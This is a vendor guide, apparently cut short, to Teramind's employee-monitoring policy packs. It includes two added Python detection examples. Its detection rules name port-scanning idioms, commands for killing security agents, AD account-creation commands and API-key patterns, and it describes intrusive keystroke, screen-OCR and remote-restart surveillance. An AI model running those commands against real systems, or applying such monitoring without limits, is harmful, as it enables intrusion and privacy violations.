Introduction
Teramind's demo policies and rules are a curated library of pre-built, ready-to-import policy packs designed to give security and compliance teams a head start on monitoring and enforcement. Whether you're looking to govern AI tool usage, detect insider risk, satisfy regulatory frameworks like HIPAA or PCI-DSS, or map coverage to MITRE ATT&CK tactics, these policies offer practical, real-world rules you can import directly into your Teramind instance and deploy with minimal configuration. Each policy and rule is self-contained and can be used as-is or extended with additional criteria to fit your environment.
Use this guide to learn about each policy and its rules, then download and import them directly into your Teramind instance for immediate use.
Downloading the Demo Policies
Via Direct Links
Click the links below to download the policies:
From the Teramind Demo
You can also download them from the Teramind Demo (under Configurations > Behavior Policies). Click the Three Dots in front of a policy and then select Export Policy:
Importing the Demo Policies to Your Instance
To import a policy, click the Three Dots located near the top right corner of the Configurations > Behavior Policy screen and then select Import Policy:
Note: Most of the rules under each policy are ready to use out of the box, though some may require tuning for your specific environment. You can also extend them with additional detection criteria and conditions.
Description of the Demo Policies and Rules
1. AI Usage
This policy governs how employees interact with AI tools, both approved and unapproved. Its rules span the full spectrum of AI-related risk: shadow AI desktop apps, browser-based AI portals, autonomous agents, credential exposure, and data sovereignty. Together they give security teams visibility and control over an attack surface that most legacy policies do not address.
Detect AI Application Execution
While many security protocols focus on web traffic, standalone desktop AI models often run locally and can bypass traditional browser-based proxy filters. This rule creates a gatekeeper for these applications to ensure that all AI processing occurs only through approved, monitored channels rather than unmanaged desktop software.
This rule identifies standalone desktop AI apps such as claude.exe, perplexity.exe, chatgpt.exe, ollama.exe, lm studio.exe, and dozens of others, which can circumvent standard web-based security layers. It utilizes the Application Name criterion to detect these specific binaries the moment they are executed on the user's machine. By identifying these "Shadow AI" applications, the system can prevent unmanaged tools from processing sensitive company data. The Warn action alerts the user immediately that they are not permitted to use that specific software, prompting them to switch to authorized web portals.
Detect AI by Text on Screen
Identifying direct interaction with AI assistants often requires visual context that standard logs might miss, especially when AI features are embedded within other platforms.
This rule identifies when a Google Gemini prompt interface is actively visible on a user's screen, indicating direct engagement with the assistant. It utilizes Teramind's patented OCR technology to scan every pixel of the employee's screen in real-time for specific phrases such as "Enter a prompt for Gemini" or "Ask Gemini 3". Upon detection, the rule triggers a Notify action to designated administrators, providing instant visibility into real-time AI engagement that traditional text logs might otherwise overlook.
Detect AI-Native Browser Launch
The market is now seeing the rise of AI-centric browsers that prioritize assistant sidebars over traditional security perimeters. This rule identifies and warns users against using these unrecognized tools to ensure all web activity remains within the organization's vetted and secured browser ecosystem.
This rule identifies and warns users against using unrecognized AI-centric browsers that have not been vetted by IT security for safe corporate use. It uses an Application Name criterion to detect binaries such as fellou.exe, comet.exe, neon.exe, monica.exe, and similar AI-first browsers. Because these tools may handle user sessions or data scraping differently than standard browsers, they represent a high-risk "Shadow AI" channel. The Warn action displays an urgent HTML message informing the user they are using an unauthorized browser, guiding them back to approved software.
Detect Claude CLI Access
Developers frequently use command-line (CLI) AI agents such as Claude Code, which handle large codebases entirely out of view of browser monitors. This rule ensures that terminal-based AI usage is transparently tracked to prevent the leakage of proprietary source code or infrastructure keys.
This rule tracks CLI AI agents operating in a channel normally invisible to browser-level monitoring. It triggers when the Application Name criterion detects a system shell (such as cmd.exe or windowsterminal.exe) and the Application Caption (window title) contains the keyword claude. This specific logic identifies the moment a developer initiates an AI-assisted session within their terminal environment. The Notify action ensures the security team receives an internal notification, providing an audit trail for all commands executed by the AI agent.
Detect OpenClaw Agent Activity
Autonomous AI agents can perform filesystem operations and background tasks that may circumvent standard security perimeters if left unmonitored.
This rule surfaces unauthorized autonomous AI tool usage by monitoring for active OpenClaw agent processes on endpoints. It utilizes a File Operation criterion to detect Write operations performed by the node.exe application targeting specific session directories, such as \.openclaw\agents\main\sessions\. The rule covers both Windows and Unix path formats. If such activity is detected, a Warn action informs the user that unauthorized activity has been identified, ensuring that agents do not perform background tasks without proper oversight.
Detect OpenClaw Command Execution
Establishing a transparent audit trail of autonomous agent actions is critical for identifying unauthorized use of AI automation tools on endpoints.
This rule flags when OpenClaw AI agent commands are executed via Node.js on the endpoint, creating a record of autonomous actions. It uses the Application Name criterion that monitors for the node process paired with the Application Args (command-line arguments) criterion containing openclaw. When an execution is detected, a Warn action is triggered to notify the user and audit the agent's behavior to ensure it does not bypass security controls.
Detect OpenClaw Configuration Change
AI agents require consistent, secured configurations to prevent unauthorized shifts in their operational scope or security posture.
This rule monitors for unauthorized writes to the OpenClaw configuration file to ensure that AI agent settings are not tampered with. By flagging modifications to the openclaw.json file, the system prevents changes that could weaken security policies or expand agent capabilities beyond their intended scope. The rule utilizes the File Operation criterion to specifically detect Write operations targeting the configuration path on both Windows (\.openclaw\openclaw.json) and Unix (/.openclaw/openclaw.json) systems. Upon detection, a Warn action is triggered to immediately notify the user that a configuration change has been identified.
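As an added example (my own Python, not Teramind's code or configuration), the following shows how the two OpenClaw file-operation rules above can be evaluated with a single normalised path check that accepts both the Windows and the Unix path forms. The bare process name node for the Unix case and the sample events are assumptions, and the events are constructed rather than captured from an endpoint.

```python
import re
from typing import Optional

# Rule definitions taken from the two rule descriptions above:
# (rule name, process names that must perform the write or None for any, path needle).
# Needles are in lower-case forward-slash form so one check covers both path styles.
OPENCLAW_RULES = [
    ("Detect OpenClaw Agent Activity", {"node.exe", "node"}, ".openclaw/agents/main/sessions/"),
    ("Detect OpenClaw Configuration Change", None, "/.openclaw/openclaw.json"),
]


def normalise_path(path: str) -> str:
    """Map a Windows or POSIX path to a canonical form for substring/suffix matching.

    Backslashes become forward slashes, repeated separators collapse, and the
    result is lower-cased. Lower-casing is correct for Windows (case-insensitive
    file systems) and is applied to POSIX paths too as a deliberate
    recall-over-precision assumption, so '.OpenClaw' is caught on either system.
    """
    canonical = path.replace("\\", "/")
    canonical = re.sub(r"/+", "/", canonical)
    return canonical.lower()


def openclaw_rule_for(app_name: str, operation: str, path: str) -> Optional[str]:
    """Return the name of the rule a file-operation event triggers, or None.

    Only Write operations are in scope for both rules. The sessions rule is
    restricted to the Node.js process; the config rule fires for any writer.
    """
    if operation != "Write":
        return None
    norm = normalise_path(path)
    app = app_name.lower()
    for rule_name, allowed_apps, needle in OPENCLAW_RULES:
        if allowed_apps is not None and app not in allowed_apps:
            continue
        if needle.endswith("/"):
            hit = needle in norm          # any file written under the sessions directory
        else:
            hit = norm.endswith(needle)   # exactly the configuration file
        if hit:
            return rule_name
    return None


# Constructed sample events (app name, operation, path); not captured from a real endpoint.
SAMPLE_EVENTS = [
    ("node.exe", "Write", r"C:\Users\alice\.openclaw\agents\main\sessions\2f1c.jsonl"),
    ("node", "Write", "/home/alice/.openclaw/agents/main/sessions/2f1c.jsonl"),
    ("Code.exe", "Write", r"C:\Users\alice\.OpenClaw\openclaw.json"),
    ("node.exe", "Read", r"C:\Users\alice\.openclaw\agents\main\sessions\2f1c.jsonl"),
    ("explorer.exe", "Write", r"C:\Users\alice\.openclaw\agents\main\sessions\notes.txt"),
]


def evaluate(events=SAMPLE_EVENTS) -> list:
    """Pair each event with the rule it triggers (None when no rule applies)."""
    return [(app, op, openclaw_rule_for(app, op, path)) for app, op, path in events]


if __name__ == "__main__":
    for app, op, rule in evaluate():
        print(f"{app:<14}{op:<7}{rule}")
```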
Block File Upload to AI Chat
AI portals offer direct document analysis features that represent a major vector for data exfiltration. This rule enforces a strict boundary by blocking the upload of documents to recognized AI domains, ensuring that sensitive internal files maintain their data sovereignty and are not used for model training.
This rule stops internal documents from being uploaded to major AI portals to maintain data sovereignty and prevent the loss of proprietary information. It relies on File Operation (Upload) and Upload URL criteria to target uploads to a comprehensive list of known AI domains, including chatgpt, claude, copilot, grok, gemini, perplexity, deepseek, mistral.ai, huggingface.co, midjourney.com, runwayml.com, and over 40 others. By filtering based on the destination URL, the system identifies when a user is attempting to move local files into an unmanaged AI portal. The Block action prevents the transfer from completing and displays an HTML message informing the user of the data protection restriction.
Block Credit Card Sharing with AI
Users often paste sensitive PII, PHI, or financial data into AI tools to reformat or summarize it, creating significant compliance risks. This rule inspects the clipboard to ensure that regulated data like credit card numbers is never transferred to a public AI interface.
This Content Sharing rule inspects the clipboard in real-time and intercepts when regulated data is pasted into AI portals. It utilizes built-in Predefined Classified Data (Financial Data) criteria in Strict mode to detect exactly formatted credit card numbers the moment they are copied. By checking if the destination URL belongs to a known AI domain, including claude.ai, chatgpt.com, gemini.google.com, grok.com, deepseek, and 80+ other platforms, the system shows a warning message to the user via the Warn action and simultaneously alerts an administrator to the specific data violation via the Notify action.
Detect API Key Paste to AI Apps
One of the most common causes of data breaches is the accidental inclusion of hardcoded API keys in prompts sent to AI tools for debugging. This rule proactively monitors for these patterns to prevent credentials from being shared with public LLMs, which could lead to unauthorized server access.
This rule monitors keystrokes in coding applications and AI tools to prevent credential theft caused by pasting API keys into AI tools for debugging or code generation. It uses a Matches regex condition to identify exact patterns for major provider keys, including OpenAI (sk-[a-zA-Z0-9]{48}), Anthropic (sk-ant-api03-...), Google AI (AIza...), Groq (gsk_...), xAI (xai-...), Perplexity (pplx-...), Hugging Face (hf_...), Replicate (r8_...), and NVIDIA (nvapi-...), typed into a broad list of high-risk applications like cursor.exe, chatgpt.exe, windsurf.exe, or perplexity.exe. The Warn action ensures the user is immediately alerted to their mistake while security is notified of the potential leak.
Allow Only Corporate Claude Account (Requires Configuration)
In the modern enterprise, maintaining a clear boundary between personal AI usage and corporate-approved environments is critical for ensuring security. Without such distinctions, sensitive corporate data can easily leak into unmanaged personal accounts, circumventing organizational security perimeters and compliance mandates.
This rule is designed to identify and block unauthorized Claude AI accounts, ensuring that all employee interactions remain strictly within the organization's approved and monitored instance. The rule functions by monitoring Webpages activity for API resource requests directed at the claude.ai/api/organizations/ path. By utilizing an Except condition to whitelist your specific corporate tenant ID, the system blocks all other organization-level requests, effectively preventing access to personal or unmanaged Claude workspaces. When an unauthorized access attempt is detected, the Block action is triggered, presenting the user with a message directing them to use the authorized corporate account.
Note: When deploying this rule, replace the Except field under the Webpage URL criteria with your unique organization or workspace ID, for example: 93a2013d-4b13-b130-f3a335a8240f. You can also use a Shared List to whitelist multiple workspaces.
2. Compliance Rules
This policy provides a broad library of compliance-focused rules covering data handling, system integrity, privileged actions, and behavioral indicators. Many rules align with MITRE ATT&CK techniques and internal governance requirements. They serve as the operational backbone for regulatory compliance frameworks such as HIPAA, PCI-DSS, and SOX.
Opening Teramind Agent Folder
Attempts to browse or tamper with the Teramind Agent's own installation directory can be a precursor to tampering with or disabling the monitoring system itself, a key step in covering malicious activity.
This rule monitors any file system or registry interaction with the Teramind Agent installation paths (C:\ProgramData\{4CEC2908...} and C:\ProgramData\Teramind Agent) performed via Windows Explorer (explorer.exe). It also monitors for command-line access targeting the same paths and Teramind-related registry keys under SYSTEM\CurrentControlSet\Services\. Any access, write, rename, delete, or folder operation in these locations triggers a Warn action.
Pasting Text that Contains Predefined Sensitive Keywords
Clipboard monitoring provides a direct window into what information employees are actively moving between applications. Intercepting sensitive keywords during paste operations prevents unintentional or deliberate sharing of confidential content.
This Content Sharing rule triggers when text containing terms like "sensitive", "word", or "confidential" is pasted from the clipboard into any application except Notepad. It uses both text and binary content inspection criteria to catch these keywords in all data types. The Warn action alerts the user that they are distributing potentially sensitive information.
T1059.001 Command and Scripting Interpreter: PowerShell
Elevated PowerShell execution is a hallmark of both legitimate administrative work and many attack chains. Detecting and logging its use, particularly with elevated privileges, is essential for distinguishing authorized from unauthorized system changes.
This rule triggers when powershell.exe is launched with elevated (administrator) privileges, provided the window title does not contain "teams" (to reduce false positives from Microsoft Teams). It uses the Application Name and Elevated criteria in combination. The Warn action notifies the user and creates a log entry for auditors.
Login Outside of Working Hours
After-hours logins are a significant indicator of insider threat activity or compromised credentials. Detecting fresh logins (not screen unlocks) during non-business hours enables rapid response before damage occurs.
This Agent-Based Schedule rule fires when a user logs into Windows for the first time (not a screen unlock) between midnight and 10:00 AM or between 6:00 PM and midnight. The Notify action sends an alert to the incident response team email addresses configured in the rule, providing immediate situational awareness.
Running Port Scanning Tools
Port scanning tools are almost exclusively used for reconnaissance, either legitimately by authorized network administrators or maliciously by attackers mapping the internal network. Any unauthorized usage should be flagged immediately.
This rule detects the execution of nmap.exe or any command-line invocation of the PowerShell TCP socket syntax New-Object System.Net.Sockets.TCPClient, which is a common technique for homemade port scanning in environments where nmap is blocked. The Warn action is triggered to alert the user and create an audit record.
TBG008 Classified Documents
Documents marked as classified or top-secret require a heightened level of scrutiny. Detecting when such documents appear on screen, regardless of their origin, provides visibility that file-based monitoring alone cannot.
This rule uses OCR to scan the visible screen in real-time for classification labels: "top secret", "classified", "top-secret", and "privileged". The rule is scheduled to operate during business hours (04:10–16:05) and triggers a Notify action to the designated administrator when such text is detected on screen.
TBG002 Printing Resume
Printing a resume or cover letter from a corporate device during business hours is a meaningful behavioral signal that an employee may be actively job-seeking and represents a potential flight risk indicator.
This rule monitors print jobs and triggers when a document's name contains "resume" or "cover letter". Using Teramind's Printed Documents monitoring capability, it captures this event and sends a Notify action to the assigned administrator. The rule runs 24/7 to capture after-hours printing as well.
Changing Windows Startup Configuration
Modifications to the Windows Startup folder are a classic persistence technique. While sometimes legitimate, this action should always be logged and reviewed, particularly on servers and endpoints with elevated access.
This rule triggers on Write operations to either the system-wide (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp) or user-specific (\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) startup folders, performed via Explorer. It also detects when the user navigates to the Startup folder in Windows Explorer (via window title). The Warn action fires immediately upon detection.
TBG003 Copying Multiple Credit Cards
Single card copies may occur during normal payment processing, but bulk copying of multiple credit card numbers simultaneously is a strong indicator of data harvesting or skimming activity.
This rule uses the Financial Content (Credit Card Number) classifier in Strict mode with a threshold of 2 or more card numbers in a single clipboard event. It monitors all applications and webpages for this pattern. Upon detection, a Warn action notifies the user that they have copied multiple credit card numbers.
Flag and Restart Machine on "Naked" (Excluding Sensitive Contexts)
Monitoring for inappropriate content on corporate devices is an important compliance and HR requirement. However, broad keyword matching often creates false positives in sensitive professional contexts like legal or social work environments.
This rule triggers when the word "naked" is typed in keystrokes, using a regex that deliberately excludes instances where the word is followed by terms like victim, abuse, assault, report, case, child, or investigation. This prevents false positives during legitimate discussions. When the term is detected in a non-exempted context, the rule executes a remote Command action to immediately restart the machine (shutdown /r /t 0).
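Added example (my own Python, not Teramind's code) serving both the "Detect API Key Paste to AI Apps" rule in the AI Usage policy and the keyword rule above: it runs a keystroke buffer through the provider-key patterns and through a negative-lookahead regex that suppresses the keyword when the next word is an exempt term. The OpenAI pattern is the one the page gives; the suffix character classes and minimum lengths for the other providers, the reading of "followed by" as the immediately following word, and the four-entry high-risk application list are assumptions, and all sample text and key values are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Credential patterns for "Detect API Key Paste to AI Apps". Prefixes and the full
# OpenAI pattern come from the rule description; suffix classes and minimum lengths
# for the other providers are assumptions, since the description lists prefixes only.
CREDENTIAL_PATTERNS = {
    "OpenAI":       re.compile(r"\bsk-[a-zA-Z0-9]{48}\b"),
    "Anthropic":    re.compile(r"\bsk-ant-api03-[A-Za-z0-9_\-]{20,}"),
    "Google AI":    re.compile(r"\bAIza[0-9A-Za-z_\-]{35}"),
    "Groq":         re.compile(r"\bgsk_[A-Za-z0-9]{20,}\b"),
    "xAI":          re.compile(r"\bxai-[A-Za-z0-9]{20,}\b"),
    "Perplexity":   re.compile(r"\bpplx-[A-Za-z0-9]{20,}\b"),
    "Hugging Face": re.compile(r"\bhf_[A-Za-z0-9]{20,}\b"),
    "Replicate":    re.compile(r"\br8_[A-Za-z0-9]{20,}\b"),
    "NVIDIA":       re.compile(r"\bnvapi-[A-Za-z0-9_\-]{20,}"),
}

# Applications named in the rule description; the policy's own list is longer (assumption).
HIGH_RISK_APPS = {"cursor.exe", "chatgpt.exe", "windsurf.exe", "perplexity.exe"}


def keyword_with_exclusions(keyword: str, exempt_followers: List[str]) -> re.Pattern:
    """Whole-word keyword match with a negative lookahead that drops the match when
    the next word is an exempt term (the false-positive guard the rule describes)."""
    alternatives = "|".join(re.escape(w) for w in exempt_followers)
    return re.compile(rf"\b{re.escape(keyword)}\b(?!\s+(?:{alternatives})\b)", re.IGNORECASE)


EXEMPT_FOLLOWERS = ["victim", "abuse", "assault", "report", "case", "child", "investigation"]
NAKED_RULE = keyword_with_exclusions("naked", EXEMPT_FOLLOWERS)


@dataclass(frozen=True)
class Finding:
    rule: str       # rule name as it appears in the policy
    label: str      # provider name or the matched keyword
    line_no: int
    excerpt: str    # what is safe to place in the alert body


def redact(secret: str) -> str:
    """Keep an 8-character prefix so the provider is recognisable, mask the rest."""
    return secret[:8] + "*" * max(0, len(secret) - 8)


def scan_keystrokes(text: str, app_name: str) -> List[Finding]:
    """Run both keystroke rules over a buffer of typed text.

    The credential rule is scoped to the high-risk applications; the keyword rule
    is not scoped to an application in its description, so it runs everywhere.
    """
    findings: List[Finding] = []
    in_scope_for_keys = app_name.lower() in HIGH_RISK_APPS
    for line_no, line in enumerate(text.splitlines(), start=1):
        if in_scope_for_keys:
            for provider, pattern in CREDENTIAL_PATTERNS.items():
                for m in pattern.finditer(line):
                    findings.append(Finding("Detect API Key Paste to AI Apps",
                                            provider, line_no, redact(m.group(0))))
        for m in NAKED_RULE.finditer(line):
            findings.append(Finding('Flag "naked" (excluding sensitive contexts)',
                                    m.group(0).lower(), line_no, line.strip()))
    return findings


# Constructed sample values; none of these are real credentials.
FAKE_OPENAI = "sk-" + "A" * 48
FAKE_ANTHROPIC = "sk-ant-api03-" + "B" * 24
FAKE_HF = "hf_" + "C" * 30

SAMPLE_BUFFER = "\n".join([
    "why does this return 401? here is my config:",                 # 1: nothing
    "OPENAI_API_KEY=" + FAKE_OPENAI,                                 # 2: OpenAI
    "ANTHROPIC_API_KEY=" + FAKE_ANTHROPIC,                           # 3: Anthropic only, not also OpenAI
    "HF_TOKEN=" + FAKE_HF,                                           # 4: Hugging Face
    "legal: forwarded the naked victim statement to counsel",        # 5: exempt context, no alert
    "the naked pointer deref in main.c crashes on startup",          # 6: fires; the exclusions are narrow
])

if __name__ == "__main__":
    for f in scan_keystrokes(SAMPLE_BUFFER, "cursor.exe"):
        print(f"line {f.line_no}: {f.rule} [{f.label}] {f.excerpt}")
```

Line 6 of the sample shows why the note at the top of this guide recommends tuning: the exemption list only suppresses the listed follow-on words, so unrelated technical uses of the keyword still fire.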
Accessing File or Folder Sharing Settings
Opening network sharing dialogs or running share-configuration commands are activities that should be audited, particularly on sensitive servers, as they can expose internal resources to unauthorized network access.
This rule monitors for the "Network access" or "Advanced Sharing" dialog titles in any application window. It also detects command-line usage of net share, New-SmbShare, and Get-SmbShare PowerShell cmdlets. A Warn action is triggered to create an audit log of the sharing configuration activity.
Changing Internet Security Settings
Modifications to browser proxy and security zone settings can be used to bypass web filters, inject traffic, or enable access to blocked websites. This makes detecting such changes essential for maintaining network security policy integrity.
This rule fires when iexplore.exe (Internet Explorer or IE-based control panels) is opened with the window title "Internet Options". The Warn action creates a record of the attempt to modify internet security settings.
Creating a New User in Active Directory
User account creation in Active Directory is a high-value action that must be logged for both security and compliance purposes. Unauthorized account creation is a common persistence technique used by threat actors after gaining initial access.
This rule detects Active Directory user creation via two methods: the MMC snap-in (when mmc.exe shows the "New Object - User" dialog) and the command line (via New-ADUser or net user /add). The Warn action fires upon detection to create an immediate audit record.
File Sharing / Peer-to-Peer (P2P) Apps
P2P file-sharing applications represent a significant compliance and security risk: they can be used to exfiltrate data, introduce malware, and expose the organization to copyright liability.
This rule uses a Shared List (P2P application list) matched against the Application Name to detect known P2P clients at launch. The Warn action alerts the user and logs the event, providing a first-response deterrent.
T1124 System Time Discovery
Querying or modifying system time can serve as both a reconnaissance activity and a defensive technique, as attackers sometimes manipulate timestamps to confuse logging systems or bypass time-based authentication.
This rule monitors for system time discovery commands (systeminfo, net config workstation, date /t, Get-Date) executed from the command line, as well as UI access to the "Date and Time", "Date and Time Settings", and "Time Zone Settings" dialog windows. The Warn action fires to log and surface this activity.
TBG007 Threats of Violence
Workplace violence is a serious concern and early detection through communication monitoring can prevent harm. This rule surfaces threatening language typed on corporate devices.
This rule monitors keystrokes for a curated list of terms associated with threats of violence, including "gun", "bomb", "pipe bomb", "shoot up", "assassination", "hostage", "murder", "blackmail", and others. When detected, a Notify action alerts the designated administrator so that HR or security can intervene promptly.
Copying Windows Event Log Files
Windows event logs are the primary forensic artifact for incident investigation. Copying or exporting them outside normal channels may indicate an attacker trying to erase evidence of their actions, or an insider attempting to steal audit data.
This rule fires when .evtx files from C:\Windows\System32\winevt\Logs are copied via Explorer, when Event Viewer (eventvwr.exe) is launched, or when command-line copy operations targeting the event log path are detected. The Warn action creates an immediate audit record of the activity.
Downloading File from Cloud Storage Service Site
Downloads from third-party cloud storage services may represent data being exfiltrated to personal accounts, or malicious files being staged for execution. Monitoring this activity provides early warning across common platforms.
This rule fires once per day when a file download is detected from URLs belonging to Sync.com, pCloud, WeTransfer, Dropbox, Box, OneDrive, iCloud, Imgur, Onehub, or mega.nz. SVG files are excluded to reduce noise from web assets. The Warn action notifies the user and creates an audit entry.
OCR Payroll Exposure via Screencapture
Screenshots of payroll data or compensation information are a targeted form of internal data theft that standard file monitoring cannot detect, since the data never leaves as a file.
This rule triggers when the Snipping Tool (snippingtool.exe) is active while OCR detects the word "compensation" on screen. The combination of the screenshot tool and sensitive on-screen content creates a high-confidence signal that payroll data is being captured. An alert (with no additional action configured by default) is generated for review.
Using an Application for X Minutes
Extended use of non-work applications during business hours, particularly simple utilities like Calculator, is a minor productivity concern that can accumulate significantly across a workforce. This rule enforces time-based usage limits.
This rule monitors focused time in win32calc.exe or calculatorapp.exe and triggers when the user has been continuously focused on the application for 5 minutes (300 seconds) or more. The Warn action displays a message prompting the user to return to work.
Installing Software on Server
Software installations on servers can introduce vulnerabilities, violate licensing agreements, or be used to plant malicious tools. Every new installation should be logged and authorized.
This rule fires when msiexec (the Windows Installer engine) is detected alongside Write operations to C:\Program Files or C:\Program Files (x86), indicating a software package is being installed. The Warn action creates an immediate audit entry for IT review.
Sending Email with Sensitive File Attachment to Untrusted Domain
Outbound emails with attachments sent to external domains are the most common data exfiltration channel. This rule catches all such emails at the moment of send to enable review before data leaves the organization.
This rule monitors outgoing email activity and triggers once per day when an email with an attachment is sent to an address that does not belong to @mydomain.com. The Warn action fires and logs the event, and the daily aggregation reduces alert fatigue while ensuring coverage.
Resetting the Password of Active Directory User
Password resets are a powerful action that can be weaponized: attackers who gain access to an admin account may reset other users' passwords to lock them out or take over their sessions.
This rule detects password resets performed via the MMC "Reset Password" dialog or via command-line tools such as Set-ADAccountPassword and net user. The Warn action fires on detection to create an audit record for privileged account operations.
Exporting Data from Enterprise Web Application by File Downloading
Downloads from corporate web applications like SharePoint, OneDrive, and Azure represent a common path for insiders to bulk-collect company data before departing. Monitoring these specific sources provides targeted coverage of the highest-risk download channels.
This rule fires when files are downloaded from URLs containing "onedrive", "sharepoint", or "azure". The Warn action is triggered to log and surface the download event for security review.
Accessing System Folders
Direct file access to C:\Windows\ and its subdirectories by standard users is unusual and potentially indicative of reconnaissance, DLL injection preparation, or system tampering.
This rule monitors for File Access operations targeting any path under C:\Windows\ on all drives. The Warn action fires to log the event and alert the user, creating an audit record for security review.
Editing Registry Editor Entry
The Windows Registry is a critical configuration store. Direct editing of registry values, whether through the graphical Registry Editor or via command line, can be used to disable security tools, establish persistence, or alter system behavior in malicious ways.
This rule detects registry edits through two methods: the regedit.exe GUI (when the "Edit String" dialog title is visible) and command-line usage of reg add, reg restore, Set-ItemProperty, and New-ItemProperty. A Warn action fires upon detection.
Exfiltration Over Web Service: Exfiltration to Cloud Storage Over 500MB
Large-volume uploads to personal cloud storage are a clear indicator of bulk data exfiltration, particularly common among departing employees who may attempt to take entire project folders before their last day.
This rule triggers when a file upload of more than 500 MB (500,000,000 bytes) is detected to box.com or dropbox.com. The Upload URL and Upload Size criteria work in combination to ensure only genuinely large transfers trigger the alert. The Warn action fires to surface the event.
Saving Credit Card with Snipping Tool
The Snipping Tool is a common, low-friction method for capturing screen data, including financial information displayed in business applications, without creating a file that would trigger DLP rules.
This rule fires when the Snipping Tool (snippingtool.exe) is active while OCR detects a credit card number on screen using a Shared List of credit card regex patterns. The combination provides high confidence that financial data is being captured as an image. An alert is generated for security review.
Searching Data on Darknet TOR (The Onion Router)
TOR browser usage on corporate devices is a significant risk indicator: it may be used to communicate with threat actors, browse illegal marketplaces, or access data leak sites.
This rule monitors web page visits and fires when any URL containing the .onion TLD is accessed, indicating TOR browser activity. The Warn action fires to alert the user and log the event.
Trying to Kill Teramind Processes on Windows
Attempts to terminate the Teramind monitoring agent are an unambiguous indicator of malicious intent or policy circumvention. This rule ensures any such attempt is immediately surfaced.
This rule monitors for the launch of process management tools (taskmgr.exe, processhacker.exe, procexp.exe) or command-line arguments containing taskkill, Stop-Process, or the names of core Teramind processes (mtm.exe, mtm64.exe, svc.exe, dmw.exe, tmagent.exe, tmagentsvc.exe, tsvchst). The Warn action fires immediately to alert the security team.
T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB
USB devices are a classic and reliable exfiltration channel. Files written to external drives, or copied from external drives, represent a direct physical data transfer that bypasses all network controls.
This rule triggers on any file Access or Write operation targeting %EXTERNALDRIVES%, or on Copy operations originating from an external drive. The Warn action fires to create an audit record of the USB interaction (MITRE ATT&CK ID: T1052.001).
Clearing Browsing History in Google Chrome
Clearing browser history can be a normal user action, but when combined with other suspicious behaviors, it often represents an attempt to remove evidence of policy-violating or malicious web activity.
This rule detects history clearing through two paths: a file Delete operation on the Chrome user data path (\AppData\Local\Google\Chrome\User Data), or the Chrome settings URL chrome://settings/clearBrowserData being visible in a window title. It also detects command-line deletions of that directory. The Warn action fires to log the event.
Copying Credit Card Number to the Clipboard
Any copy of a credit card number from any application is a compliance-relevant event under PCI-DSS. This broad rule provides a daily audit log of all such clipboard operations, regardless of where the data was pasted.
This rule uses the Financial Content (Credit Card Number) classifier in Loose detection mode (to capture partial or near-match card formats) with a count of 1 or more, triggered on clipboard operations from any application. The daily period aggregation prevents alert fatigue. The Warn action notifies the user.
T1552 Unsecured Credentials
Credentials stored or transferred via Notepad are a classic operational security failure: developers or administrators often temporarily paste usernames and passwords into plain text files.
This rule fires when clipboard content containing the words "Username" or "Password" is pasted into notepad.exe. The Warn action triggers immediately to discourage insecure credential handling and create an audit record.
TBG006 Attempts to Access Restricted Drive
Certain drives may be designated as restricted in the organization's data classification policy. Any access to these drives from unauthorized users represents a serious policy violation.
This rule monitors all file operations (Any) targeting the G: drive (which should be replaced with the actual restricted drive letter in your environment). The Block action immediately prevents access and displays an "Access Denied" HTML message to the user.
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Batch file and shell command execution through cmd.exe is a foundational technique used in both administration and attacks. Detecting command-line invocations with .exe or .bat arguments enables broad visibility into command execution activity.
This rule fires when a command-line process is detected with arguments containing .exe, .bat, or a /c switch (excluding URLs containing //c). This covers both direct batch file execution and the classic cmd /c syntax used for one-liner command execution. The Warn action fires to log the activity.
Pasting Files Copied from Sensitive Folders
When files are copied from designated sensitive directories, whether a local protected folder or a network share, and pasted elsewhere, the destination becomes unknown. This rule tracks the source of the copy to flag when sensitive content is being relocated.
This rule monitors Copy operations where the source path includes a known sensitive directory (e.g., C:\Users\j.jet\Desktop\Test Zone\sensitive) or where files are copied from network shares (%ALLSHARES%). The Warn action fires with a message to the user when this pattern is detected.
Connecting to a Remote Registry on Windows
Accessing the registry of a remote machine is an advanced administrative operation that can also be a precursor to lateral movement, persistence installation, or configuration tampering on other endpoints.
This rule detects remote registry access via the regedit.exe "Select Computer" dialog, or via the command-line reg query command targeting a remote host. The Warn action fires to create an audit log of the remote registry connection attempt.
Importing Windows Registry Data
Importing a .reg file overwrites existing registry values and can silently install malicious configurations, persistence mechanisms, or security bypasses.
This rule detects registry imports through the reg import command, through the Registry Editor's "Import Registry File" dialog, or through Windows Explorer opening a .reg file. The Warn action fires immediately to alert the user and create an audit record.
Zipping File with Password
Password-protected archives are a common technique for concealing file contents and bypassing content inspection at the network perimeter. While sometimes legitimate, this action warrants logging, particularly around sensitive data repositories.
This rule detects password-protected archive creation in WinRAR (WinRAR.exe) via the "Enter password" or "Archive name and parameters" dialogs, in 7-Zip (7zG.exe) via the "Add to Archive" dialog, and via command-line rar.exe -P or 7z.exe -p invocations. The rule aggregates once per day. The Warn action fires upon detection.
Printing Large Number of Pages
Bulk printing is a classical pre-departure exfiltration method. Documents that are too large to email or copy quickly can be physically removed if printed, particularly in regulated industries where hard copies carry significant value.
This rule triggers when a print job of 60 or more pages is submitted. It uses the Print size criterion to detect bulk print events. An alert is generated for security review with no additional action configured by default.
Performing File or Folder Copy
Large-scale file copy operations from user directories or network shares are a common indicator of data staging, aggregating files in preparation for exfiltration. This rule provides visibility into significant copy operations.
This rule fires when Copy operations are detected from user directories (under C:\Users) to any drive (excluding Windows system folders), or from network shares (%ALLSHARES%). It also detects command-line equivalents including robocopy, copy-item, cp, and xcopy. The Warn action fires and triggers a 60-second pre/post screen recording window to capture the user's actions in context.
Saving Email File Attachment to a Local Sync Folder
Saving email attachments directly into a cloud-synced folder is an indirect exfiltration method that automatically transfers data to a personal cloud storage account without triggering direct upload alerts.
This rule fires when Outlook (outlook.exe) writes a file to a cloud client sync destination, or when a file is downloaded from Gmail (mail.google.com) that is not a known analytics file (excluding logstreamz and jserror). The Warn action fires to alert the user that saving email attachments to sync folders is restricted.
T1219 Remote Access Software
Third-party remote access tools provide persistent, encrypted tunnels into endpoints that bypass standard network monitoring. While some are IT-approved, unapproved tools are a significant security risk.
